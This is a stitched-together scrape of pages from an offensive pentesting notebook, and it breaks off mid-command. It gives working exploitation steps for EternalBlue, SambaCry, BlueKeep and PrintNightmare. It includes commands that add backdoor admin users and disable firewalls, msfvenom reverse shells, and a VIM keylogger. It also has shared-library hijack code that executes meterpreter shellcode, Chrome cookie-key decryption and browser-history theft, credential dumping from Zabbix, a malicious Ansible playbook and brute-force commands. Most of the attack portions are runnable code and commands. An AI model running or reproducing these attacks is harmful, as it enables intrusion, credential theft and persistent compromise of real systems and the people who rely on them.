[https://github.com/cube0x0/CVE-2021-1675/blob/main/CVE-2021-1675.py](https://github.com/cube0x0/CVE-2021-1675/blob/main/CVE-2021-1675.py) * [https://github.com/cube0x0/CVE-2021-1675/blob/main/SharpPrintNightmare/CVE-2021-1675.py](https://github.com/cube0x0/CVE-2021-1675/blob/main/SharpPrintNightmare/CVE-2021-1675.py) * [https://www.hackthebox.eu/blog/windows-protocols-python](https://www.hackthebox.eu/blog/windows-protocols-python) **Usage** 1. Prepare [an SMB share with anonymous authentication](https://github.com/snovvcrash/PPN/blob/master/pentest/infrastructure/ad/smb-rpc.md#smb-share-with-null-authentication) allowed (`smbserver.py` also works): 2. Generate an evil DLL: a С2 stager / add user to a privileged group ([1](https://github.com/newsoft/adduser) , [2](https://github.com/calebstewart/CVE-2021-1675/blob/main/nightmare-dll/nightmare/dllmain.cpp) , [3](https://github.com/calebstewart/CVE-2021-1675/tree/main/nightmare-dll) , etc.) / invoke a [custom](https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/dll-hijacking#your-own) command (see example below). 3. Run the exploit: [![Logo](https://ppn.snovvcra.sh/~gitbook/image?url=https%3A%2F%2Fsnovvcra.sh%2Fapple-touch-icon.png&width=20&dpr=3&quality=100&sign=39de3028&sv=2)Leveraging PrintNightmare to Abuse RBCD and DCSync the Domainsnovvcrash@gh-pages:~$ \_](https://snovvcrash.github.io/2021/06/30/leveraging-printnightmare-to-abuse-rbcd.html) #### [](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#c) C# RCE + LPE: * [https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare](https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare) #### [](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#powershell) PowerShell LPE: * [https://github.com/calebstewart/CVE-2021-1675](https://github.com/calebstewart/CVE-2021-1675) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#reproducibility) Reproducibility Flowchart by [@wdormann](https://twitter.com/wdormann) : [https://twitter.com/wdormann/status/1412906574998392840twitter.com](https://twitter.com/wdormann/status/1412906574998392840) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#mitigation) Mitigation * [https://github.com/LaresLLC/CVE-2021-1675](https://github.com/LaresLLC/CVE-2021-1675) Last updated 8 months ago * [net\_api](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#net_api) * [EternalBlue](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#eternalblue) * [Unauthenticated (FuzzBunch + Wine)](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#unauthenticated-fuzzbunch--wine) * [Authenticated (Windows 2003 or R/W Pipe)](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#authenticated-windows-2003-or-r-w-pipe) * [SambaCry](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#sambacry) * [MSF](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#msf-1) * [Manually](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#manually-1) * [BlueKeep](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#bluekeep) * [PrintNightmare](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#printnightmare) * [Check](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#check) * [Exploit](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#exploit) * [Reproducibility](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#reproducibility) * [Mitigation](https://ppn.snovvcra.sh/pentest/infrastructure/low-hanging-fruits#mitigation) Copy $ python2 fbcli.py eternalblue --TargetIp 192.168.1.11 $ python2 fbcli.py doublepulsar --TargetIp 192.168.1.11 --Function Ping $ python2 fbcli.py doublepulsar --TargetIp 192.168.1.11 --Function RunDLL --DllPayload /tmp/createuser.dll --ProcessName spoolsv.exe $ python2 fbcli.py doublepulsar --TargetIp 192.168.1.11 --Function Uninstall Copy $ sudo nmap -n -Pn -sV --script smb-vuln-ms17-010 10.10.13.37 -p139,445 Or msf > use auxiliary/scanner/smb/smb_ms17_010 msf > set RHOSTS file:smb.txt msf > set THREADS 25 msf > run Copy msf > use exploit/windows/smb/ms17_010_eternalblue msf > set RHOSTS file:smb.txt msf > set LHOST eth0 msf > set LPORT 1337 msf > run Copy msf > use exploit/windows/smb/ms17_010_psexec msf > set RHOSTS file:smb.txt msf > set LHOST eth0 msf > set LPORT 1337 msf > run Copy msf > use auxiliary/admin/smb/ms17_010_command msf > set RHOSTS file:smb.txt msf > set COMMAND "net user hax0r Passw0rd! /add && net localgroup administrators hax0r /add" msf > run Copy $ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev.exe $ python send_and_execute.py 10.10.13.38 rev.exe Copy $ python zzz_exploit.py 192.168.1.11 zzz\_exploit.py Copy def smb_pwn(conn, arch): service_exec(conn, r'cmd /c net user hax0r Passw0rd! /add && cmd /c net localgroup administrators hax0r /add && cmd /c netsh firewall set opmode disable') Copy $ git clone https://github.com/worawit/MS17-010.git && cd MS17-010 $ git checkout -b smb_get_file 83b3745 $ wget https://gist.github.com/snovvcrash/e910523a366844448e3a2b40685969e7/raw/e00b7b04aa5c96b0e5f21eae305448cf3c2fd4fa/zzz_smb_get_file.patch $ git apply zzz_smb_get_file.patch Copy msf > use exploit/linux/samba/is_known_pipename msf > set SMB::AlwaysEncrypt false msf > set SMB::ProtocolVersion 1 msf > run pwn.c Copy // gcc -shared -fPIC -o pwn.so pwn.c #include #include static void pwn() __attribute__((constructor)); void pwn() { setresuid(0,0,0); system("echo 'root:Passw0rd!'|chpasswd"); } Copy $ rpcclient -U'%' -c'netsharegetinfo ShareName' 10.10.13.37 path: /home/snovvcrash/sharename Copy $ pip install virtualenv $ virtualenv -p /usr/bin/python2.7 $ source venv/bin/activate.sh $ pip install -r requirements.txt $ . venv/bin/activate $ ./exploit.py -t 10.10.13.37 -e pwn.so -s ShareName -r /home/snovvcrash/sharename/pwn.so -u anonymous -p '' Copy msf > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep msf > set RHOSTS file:rdp.txt msf > set THREADS 25 msf > run Copy msf > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce msf > set RHOSTS file:rdp.txt.txt msf > set LHOST eth0 msf > set LPORT 1337 msf > run Copy $ cme smb hosts.txt -u snovvcrash -p 'Passw0rd!' -M spooler Copy $ poetry run itwasalladream -d megacorp.local -u snovvcrash -p 'Passw0rd!' 192.168.1.0/24; cat "report_`date +'%Y_%m_%d_%H%M'`"* | grep -P '\d+\.\d+\.\d+\.\d+,Yes' Copy $ python CVE-2021-1675.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 '\\10.10.13.37\share\pwn.dll' pwn.c Copy // x86_64-w64-mingw32-gcc pwn.c -o pwn.dll -shared #include #include #include // Default function that is executed when the DLL is loaded void Entry() { system("powershell -enc "); } BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: CreateThread(0, 0, (LPTHREAD_START_ROUTINE)Entry, 0, 0, 0); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } --- # DevOps | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/devops.md) . [Ansible](https://ppn.snovvcra.sh/pentest/infrastructure/devops/ansible) [Artifactory](https://ppn.snovvcra.sh/pentest/infrastructure/devops/artifactory) [Atlassian](https://ppn.snovvcra.sh/pentest/infrastructure/devops/atlassian) [Containerization / Orchestration](https://ppn.snovvcra.sh/pentest/infrastructure/devops/containerization-orchestration) [GitLab](https://ppn.snovvcra.sh/pentest/infrastructure/devops/gitlab) [HashiCorp Vault](https://ppn.snovvcra.sh/pentest/infrastructure/devops/hashicorp-vault) [Jenkins](https://ppn.snovvcra.sh/pentest/infrastructure/devops/jenkins) [VS Code](https://ppn.snovvcra.sh/pentest/infrastructure/devops/vscode) [Zabbix](https://ppn.snovvcra.sh/pentest/infrastructure/devops/zabbix) Last updated 3 years ago --- # Zabbix | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/devops/zabbix.md) . * [https://telegra.ph/zametki-pro-zabbix-02-27](https://telegra.ph/zametki-pro-zabbix-02-27) Grab DB creds: Copy $ cat /etc/zabbix/zabbix_server.conf | grep '^DB' Grab local creds: Copy $ psql postgresql://Admin:zabbix@localhost/zabbix -c 'select userid, alias, name, surname, passwd, attempt_ip from users' Grab LDAP creds: Copy $ psql postgresql://Admin:zabbix@localhost/zabbix -c 'select ldap_host, ldap_port, ldap_base_dn, ldap_bind_dn, ldap_bind_password from config' Last updated 2 years ago --- # Post Exploitation | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/post-exploitation.md) . [](https://ppn.snovvcra.sh/pentest/infrastructure/post-exploitation#linux) Linux ------------------------------------------------------------------------------------- * [https://github.com/blendin/3snake](https://github.com/blendin/3snake) * [https://github.com/hackerschoice/ssh-key-backdoor](https://github.com/hackerschoice/ssh-key-backdoor) * [https://github.com/MegaManSec/SSH-Snake](https://github.com/MegaManSec/SSH-Snake) * [https://www.thc.org/ssh-it/](https://www.thc.org/ssh-it/) Search SSH logs for connection source IPs: Copy $ sudo zgrep -ah sshd /var/log/auth.log* | grep Accepted ### [](https://ppn.snovvcra.sh/pentest/infrastructure/post-exploitation#vim-keylogger) VIM Keylogger Create a VIM config that will save contents of a modified file when ran with sudo: settings.vim Copy :if $USER == "root" :autocmd BufWritePost * :silent :w! >> /tmp/tmp0x031337 :endif Copy $ sudo -u victim mkdir -p /home/victim/.vim/plugin $ sudo -u victim bash -c 'echo -n OmlmICRVU0VSID09ICJyb290Igo6YXV0b2NtZCBCdWZXcml0ZVBvc3QgKiA6c2lsZW50IDp3ISA+PiAvdG1wL3RtcDB4MDMxMzM3CjplbmRpZgo=|base64 -d > /home/victim/.vim/plugin/settings.vim' ### [](https://ppn.snovvcra.sh/pentest/infrastructure/post-exploitation#shared-libraries-hijacking) Shared Libraries Hijacking #### [](https://ppn.snovvcra.sh/pentest/infrastructure/post-exploitation#ld_library_path) `LD_LIBRARY_PATH` * [https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/Linux%20Shellcode%20Loaders/sharedLibrary\_LD\_LIBRARY\_PATH.c](https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/Linux%20Shellcode%20Loaders/sharedLibrary_LD_LIBRARY_PATH.c) For example, target executable will be `/usr/bin/top`. Code skeleton: Get all shared libraries loaded by target executable: We'll be targeting the `libgpg-error.so.0` library. Include defined symbols of the original library in our custom library: Create a map file with version information of defined symbols: Prepare the listener, compile, export `LD_LIBRARY_PATH` and run top: #### [](https://ppn.snovvcra.sh/pentest/infrastructure/post-exploitation#ld_preload) `LD_PRELOAD` * [https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/Linux%20Shellcode%20Loaders/sharedLibrary\_LD\_PRELOAD.c](https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/Linux%20Shellcode%20Loaders/sharedLibrary_LD_PRELOAD.c) * [https://github.com/MatheuZSecurity/ElfDoor-gcc](https://github.com/MatheuZSecurity/ElfDoor-gcc) For example, target executable will be `/bin/cp`. Determine which functions are executed by `/bin/cp` via `LD_PRELOAD`: We'll be hooking the `getuid()` function: Compile: Create an evil alias to preserve environment variables when running `cp` with sudo (good candidates are `.bashrc` and `.bash_profile`): Run the target executable: [](https://ppn.snovvcra.sh/pentest/infrastructure/post-exploitation#browsers) Browsers ------------------------------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/pentest/infrastructure/post-exploitation#chrome-chromium) Chrome / Chromium * [https://posts.specterops.io/stalking-inside-of-your-chromium-browser-757848b67949](https://posts.specterops.io/stalking-inside-of-your-chromium-browser-757848b67949) * [https://mrd0x.com/spying-with-chromium-browsers-screensharing/](https://mrd0x.com/spying-with-chromium-browsers-screensharing/) * [https://mrd0x.com/spying-with-chromium-browsers-camera/](https://mrd0x.com/spying-with-chromium-browsers-camera/) * [https://trustedsec.com/blog/dragging-secrets-out-of-chrome-ntlm-hash-leaks-via-file-urls](https://trustedsec.com/blog/dragging-secrets-out-of-chrome-ntlm-hash-leaks-via-file-urls) #### [](https://ppn.snovvcra.sh/pentest/infrastructure/post-exploitation#local-state-key-decryption-v20) Local State Key Decryption (v20+) * [https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html](https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html) * [https://gist.github.com/snovvcrash/caded55a318bbefcb6cc9ee30e82f824](https://gist.github.com/snovvcrash/caded55a318bbefcb6cc9ee30e82f824) * [https://specterops.io/blog/2025/08/27/dough-no-revisiting-cookie-theft/](https://specterops.io/blog/2025/08/27/dough-no-revisiting-cookie-theft/) Local state key manual decryption (via DPAPI): App-bound local state key manual decryption (via DPAPI) doing LocalSystem to User context swap: **Tools** * [https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption](https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption) * [https://github.com/runassu/chrome\_v20\_decryption](https://github.com/runassu/chrome_v20_decryption) * [https://github.com/KingOfTheNOPs/cookie-monster](https://github.com/KingOfTheNOPs/cookie-monster) * [https://github.com/The-Viper-One/Invoke-PowerChrome](https://github.com/The-Viper-One/Invoke-PowerChrome) #### [](https://ppn.snovvcra.sh/pentest/infrastructure/post-exploitation#mass-history-harvesting) Mass History Harvesting Collect SQLite history DBs: Impacket's **smbclient.py** extension and parsing code to extract latest visits per a domain from `urls` table: Extension Parse Latest URLs #### [](https://ppn.snovvcra.sh/pentest/infrastructure/post-exploitation#yandex-browser) Yandex Browser * [https://github.com/Goodies365/YandexDecrypt](https://github.com/Goodies365/YandexDecrypt) * [https://github.com/akhomlyuk/Ya\_Decrypt](https://github.com/akhomlyuk/Ya_Decrypt) #### [](https://ppn.snovvcra.sh/pentest/infrastructure/post-exploitation#tools) Tools **cookie\_crimes** * [https://mango.pdf.zone/stealing-chrome-cookies-without-a-password](https://mango.pdf.zone/stealing-chrome-cookies-without-a-password) * [https://github.com/defaultnamehere/cookie\_crimes](https://github.com/defaultnamehere/cookie_crimes) **CursedChrome** * [https://www.ired.team/offensive-security/lateral-movement/man-in-the-browser-via-chrome-extension](https://www.ired.team/offensive-security/lateral-movement/man-in-the-browser-via-chrome-extension) * [https://github.com/mandatoryprogrammer/CursedChrome](https://github.com/mandatoryprogrammer/CursedChrome) Last updated 6 months ago * [Linux](https://ppn.snovvcra.sh/pentest/infrastructure/post-exploitation#linux) * [VIM Keylogger](https://ppn.snovvcra.sh/pentest/infrastructure/post-exploitation#vim-keylogger) * [Shared Libraries Hijacking](https://ppn.snovvcra.sh/pentest/infrastructure/post-exploitation#shared-libraries-hijacking) * [Browsers](https://ppn.snovvcra.sh/pentest/infrastructure/post-exploitation#browsers) * [Chrome / Chromium](https://ppn.snovvcra.sh/pentest/infrastructure/post-exploitation#chrome-chromium) fakelib.c Copy #include #include #include #include #include static void hijack() __attribute__((constructor)); // msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.13.37 LPORT=1337 -f c -o met.c --encrypt xor --encrypt-key a unsigned char buf[] = "\x31\x33\...\x33\x37"; void hijack() { setuid(0); setgid(0); printf("Library hijacked!\n"); int bufsize = (int)sizeof(buf); for (int i = 0; i < bufsize-1; i++) { buf[i] = buf[i] ^ 'a'; } intptr_t pagesize = sysconf(_SC_PAGESIZE); mprotect((void *)(((intptr_t)buf) & ~(pagesize - 1)), pagesize, PROT_READ|PROT_EXEC); int (*ret)() = (int(*)())buf; ret(); } Copy $ ldd /usr/bin/top ... libgpg-error.so.0 => /lib/x86_64-linux-gnu/libgpg-error.so.0 Copy $ readelf -s --wide /lib/x86_64-linux-gnu/libgpg-error.so.0 | grep FUNC | grep GPG_ERROR | awk '{print "int",$8}' | sed 's/@@GPG_ERROR_1.0/;/g' >> fakelib.c Copy $ echo 'GPG_ERROR_1.0 {' > gpg.map $ readelf -s --wide /lib/x86_64-linux-gnu/libgpg-error.so.0 | grep FUNC | grep GPG_ERROR | awk '{print $8}' | sed 's/@@GPG_ERROR_1.0/;/g' >> gpg.map $ echo '};' >> gpg.map Copy $ gcc -Wall -fPIC -c -o fakelib.o fakelib.c $ gcc -shared -Wl,--version-script gpg.map -o libgpg-error.so.0 fakelib.o $ sudo LD_LIBRARY_PATH=/home/snovvcrash/ldlib top Copy $ ltrace cp ... getuid() ... evilgetuid.c Copy #define _GNU_SOURCE #include #include #include #include #include // msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.13.37 LPORT=1337 -f c -o met.c --encrypt xor --encrypt-key a unsigned char buf[] = "\x31\x33\...\x33\x37"; uid_t geteuid(void) { typeof(geteuid) *getuid_orig; getuid_orig = dlsym(RTLD_NEXT, "geteuid"); if (fork() == 0) // if inside the forked process { setuid(0); setgid(0); printf("Function hooked!\n"); int bufsize = (int)sizeof(buf); for (int i = 0; i < bufsize-1; i++) { buf[i] = buf[i] ^ 'a'; } intptr_t pagesize = sysconf(_SC_PAGESIZE); if (mprotect((void *)(((intptr_t)buf) & ~(pagesize - 1)), pagesize, PROT_READ|PROT_EXEC)) { perror("mprotect"); return -1; } int (*ret)() = (int(*)())buf; ret(); } else // if inside the original process { printf("Returning from original...\n"); return (*getuid_orig)(); } printf("Returning from main...\n"); return -2; } Copy $ gcc -Wall -fPIC -z execstack -c -o evilgetuid.o evilgetuid.c $ gcc -shared -o evilgetuid.so evilgetuid.o -ldl Copy alias sudo="sudo LD_PRELOAD=/home/victim/evilgetuid.so" Copy $ sudo cp /etc/passwd /tmp/passwd Copy $ get C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State $ cat 'Local State' | jq '.os_crypt.encrypted_key' -r | base64 -d | tail -c +6 | base64 -w0; echo PS > Add-Type -AssemblyName System.Security PS > $decrypted = [Convert]::ToBase64String([System.Security.Cryptography.ProtectedData]::Unprotect([Convert]::FromBase64String(""), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser)) PS > !echo -n $decrypted | base64 -d | od -v -An -tx1 | tr -d ' \n'; echo PS > .\SharpChrome.exe cookies /statekey:$stateKey Copy $ get C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State $ cat 'Local State' | jq '.os_crypt.app_bound_encrypted_key' -r | base64 -d | tail -c +5 | base64 -w0; echo PS (LocalSystem) > Add-Type -AssemblyName System.Security PS (LocalSystem) > $systemDecrypted = [Convert]::ToBase64String([System.Security.Cryptography.ProtectedData]::Unprotect([Convert]::FromBase64String(""), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser)) PS (User) > $userDecrypted = [System.Security.Cryptography.ProtectedData]::Unprotect([Convert]::FromBase64String($systemDecrypted), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser) PS (User) > [Text.Encoding]::ASCII.GetString($userDecrypted) # Chromium PS (User) > $stateKey = ($userDecrypted[-32..-1] | % ToString x2) -join '' # Chrome ## AES GCM (flag == decrypted_key[0] == 0x01) $ python -c "import binascii; from Crypto.Cipher import AES; user_decrypted = '$userDecrypted'; decrypted_key = binascii.a2b_base64(user_decrypted)[-61:]; elevation_service_key = bytes.fromhex('B31C6E241AC846728DA9C1FAC4936651CFFB944D143AB816276BCC6DA0284787'); cipher = AES.new(elevation_service_key, AES.MODE_GCM, nonce=decrypted_key[1:1+12]); print(cipher.decrypt_and_verify(decrypted_key[13:45], decrypted_key[45:]).hex())" ## ChaCha20 (flag == decrypted_key[0] == 0x02) $ python -c "import binascii; from Crypto.Cipher import ChaCha20_Poly1305; user_decrypted = '$userDecrypted'; decrypted_key = binascii.a2b_base64(user_decrypted)[-61:]; elevation_service_key = bytes.fromhex('E98F37D7F4E1FA433D19304DC2258042090E2D1D7EEA7670D41F738D08729660'); cipher = ChaCha20_Poly1305.new(key=elevation_service_key, nonce=decrypted_key[1:1+12]); print(cipher.decrypt_and_verify(decrypted_key[13:45], decrypted_key[45:]).hex())" PS (User) > .\SharpChrome.exe cookies /statekey:$stateKey Copy $ cat get_browser_history.cmd use c$ getBrowserHistory edge chrome $ for comp in `cat comps.txt`; do KRB5CCNAME=tickets/"`echo $comp | cut -d'.' -f1`".ccache proxychains4 -q smbclient.py -k -no-pass $comp -inputfile get_browser_history.cmd; sleep 2; done getBrowserHistory.py Copy def do_getBrowserHistory(self, browsers): browsers = [name.lower() for name in browsers.split()] for browser in browsers: if browser not in ('edge', 'chrome'): LOG.error(f'Unsupported browser: {browser}') return False usernames = [] try: for item in self.smb.listPath(self.share, '\\Users\\*'): username = item.get_longname() if item.is_directory() and username not in ('.', '..'): usernames.append(username) except Exception as e: LOG.error(f'Failed to enumerate user homes: {e}') return False browser_configs = dict.fromkeys(browsers, []) for browser in browsers: if browser == 'edge': browser_configs[browser] = ('msedge.exe', 'Microsoft\\Edge') elif browser == 'chrome': browser_configs[browser] = ('chrome.exe', 'Google\\Chrome') history_to_get = dict.fromkeys(browsers, []) for browser, config in browser_configs.items(): for username in usernames: browser_history_path = f'\\Users\\{username}\\AppData\\Local\\{config[1]}\\User Data\\Default\\History' try: _ = self.smb.listPath(self.share, browser_history_path) except: pass else: history_to_get[browser].append((browser_history_path, f'{username}_Default')) browser_history_path = f'\\Users\\{username}\\AppData\\Local\\{config[1]}\\User Data\\Profile*' try: for profile in self.smb.listPath(self.share, browser_history_path): profile = profile.get_longname() browser_history_path = browser_history_path.rsplit('\\', 1)[0] + f'\\{profile}\\History' history_to_get[browser].append((browser_history_path, f'{username}_{profile.replace(" ", "")}')) except: pass for browser, histories in history_to_get.items(): if histories: for history in histories: history_path, username = history self.do_get(history_path) new_history_name = f'history_{self.target_name}_{username}_{browser}_{datetime.now().strftime("%Y%m%dT%H%M%S")}.sqlite' os.rename('History', new_history_name) if Path(new_history_name).exists(): LOG.info(f'Downloaded "C:{history_path}" to "{new_history_name}"') parse\_urls.py Copy # python -u parse_urls.py | grep -i megacorp.com | less import os import sqlite3 from urllib.parse import urlparse from datetime import datetime, timezone def convert_chromium_time(webkit_timestamp): try: unix_timestamp = webkit_timestamp / 1000000 - 11644473600 return datetime.fromtimestamp(unix_timestamp, timezone.utc) except Exception as e: return None def extract_domain_latest_visit(db_path): domain_latest = {} try: conn = sqlite3.connect(db_path) cursor = conn.cursor() query = """ SELECT urls.url, visits.visit_time FROM urls JOIN visits ON urls.id = visits.url; """ cursor.execute(query) rows = cursor.fetchall() for url, visit_time in rows: parsed = urlparse(url) domain = parsed.netloc dt = convert_chromium_time(visit_time) if dt is None: continue if domain not in domain_latest or dt > domain_latest[domain]: domain_latest[domain] = dt except Exception as e: print(f'[!] Failed to process DB "{db_path}": {e}') finally: if 'conn' in locals(): conn.close() return domain_latest def main(): for db in [f for f in os.listdir('.') if os.path.isfile(f) and f.endswith('.sqlite')]: domain_latest = extract_domain_latest_visit(db) if domain_latest: for domain, dt in sorted(domain_latest.items(), key=lambda x: x[1], reverse=True): print(f'{db}: {domain} ({dt.strftime("%Y-%m-%d %H:%M:%S")})') if __name__ == '__main__': main() --- # L2 | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2.md) . * [https://xakep.ru/2020/06/17/windows-mitm/](https://xakep.ru/2020/06/17/windows-mitm/) Last updated 4 years ago --- # VS Code | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/devops/vscode.md) . [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/vscode#extensions) Extensions ------------------------------------------------------------------------------------------- * [https://www.mdsec.co.uk/2023/08/leveraging-vscode-extensions-for-initial-access/](https://www.mdsec.co.uk/2023/08/leveraging-vscode-extensions-for-initial-access/) * [https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/](https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/) * [https://xakep.ru/2023/10/03/macos-lpe/](https://xakep.ru/2023/10/03/macos-lpe/) * \[https://casvancooten.com/posts/2025/02/abusing-vs-codes-bootstrapping-functionality-to-quietly-load-malicious-extensions/\]https://casvancooten.com/posts/2025/02/abusing-vs-codes-bootstrapping-functionality-to-quietly-load-malicious-extensions/() [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/vscode#tunneling) Tunneling ----------------------------------------------------------------------------------------- * [https://badoption.eu/blog/2023/01/31/code\_c2.html](https://badoption.eu/blog/2023/01/31/code_c2.html) Last updated 1 year ago * [Extensions](https://ppn.snovvcra.sh/pentest/infrastructure/devops/vscode#extensions) * [Tunneling](https://ppn.snovvcra.sh/pentest/infrastructure/devops/vscode#tunneling) --- # Ansible | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/devops/ansible.md) . [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/ansible#enumeration) Enumeration ---------------------------------------------------------------------------------------------- When on ansible controller: Copy $ cat /etc/passwd | grep ans $ cat /etc/ansible/hosts $ ansible --version [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/ansible#execute-code) Execute Code ------------------------------------------------------------------------------------------------ Using ad-hoc commands: Copy $ ansible -m shell -a "echo |base64 -d|/bin/bash" --become Playbook example: evil.yml Copy # ansible-playbook evil.yml - name: Evil playbook hosts: all gather_facts: true tasks: - name: upload copy: src: /tmp/met dest: /dev/shm/met mode: a+x - name: execute shell: "nohup /dev/shm/met &" async: 10 poll: 0 [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/ansible#crack-the-vault) Crack the Vault ------------------------------------------------------------------------------------------------------ When vault-encrypted creds are discovered, the vault passwords can be cracked with hashcat: The original password can then be decrypted with ansible: Last updated 8 months ago * [Enumeration](https://ppn.snovvcra.sh/pentest/infrastructure/devops/ansible#enumeration) * [Execute Code](https://ppn.snovvcra.sh/pentest/infrastructure/devops/ansible#execute-code) * [Crack the Vault](https://ppn.snovvcra.sh/pentest/infrastructure/devops/ansible#crack-the-vault) Copy $ /usr/share/john/ansible2john.py vuln.yaml > vault.in $ hashcat -m 16900 -O -a 0 -w 3 --session=vault -o vault.out vault.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule Copy $ cat vault.in $ANSIBLE_VAULT;1.1;AES256 00000000000000000000000000000000000000000000000000000000000000000000000000000000 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 00000000000000000000000000000000000000000000000000000000000000000000000000000000 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 00000000000000000000000000000000000000000000000000000000000000000000 $ cat vault.in | ansible-vault decrypt --- # Artifactory | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/devops/artifactory.md) . * [https://keramas.github.io/2020/04/03/jfrog-ssrf-vulnerability.html](https://keramas.github.io/2020/04/03/jfrog-ssrf-vulnerability.html) Default credentials 👉🏻 `admin:password`. [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/artifactory#brute-force-access-admin) Brute Force access-admin ---------------------------------------------------------------------------------------------------------------------------- * [https://jfrog.com/knowledge-base/how-to-change-the-default-password-for-access-admin-user/](https://jfrog.com/knowledge-base/how-to-change-the-default-password-for-access-admin-user/) * [https://github.com/ffuf/ffuf-scripts](https://github.com/ffuf/ffuf-scripts) Brute force access-admin's password with [ffuf](https://github.com/ffuf/ffuf) : Copy $ echo -n access-admin > usernames.txt $ ./ffuf_basicauth.sh usernames.txt passwords.txt | ffuf -c -u http://192.168.1.11:8081/artifactory/api/v1/system/health -w -:AUTH -H 'Authorization: Basic AUTH' -H 'Content-Type: application/json' -fc 403 [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/artifactory#enumeration) Enumeration -------------------------------------------------------------------------------------------------- Spot running processes: Copy $ ps aux | grep artifactory Files location: Copy $ find /opt/jfrog/artifactory/var/data/artifactory/filestore Backup location: Copy $ find /opt/jfrog/artifactory/var/backup/access [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/artifactory#compromise-database) Compromise Database ------------------------------------------------------------------------------------------------------------------ [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/artifactory#add-admin-account) Add Admin Account -------------------------------------------------------------------------------------------------------------- Last updated 4 years ago * [Brute Force access-admin](https://ppn.snovvcra.sh/pentest/infrastructure/devops/artifactory#brute-force-access-admin) * [Enumeration](https://ppn.snovvcra.sh/pentest/infrastructure/devops/artifactory#enumeration) * [Compromise Database](https://ppn.snovvcra.sh/pentest/infrastructure/devops/artifactory#compromise-database) * [Add Admin Account](https://ppn.snovvcra.sh/pentest/infrastructure/devops/artifactory#add-admin-account) Copy $ mkdir /tmp/dbcopy $ sudo cp -r /opt/jfrog/artifactory/var/data/access/derby /tmp/dbcopy $ sudo chmod 755 /tmp/dbcopy/derby $ sudo 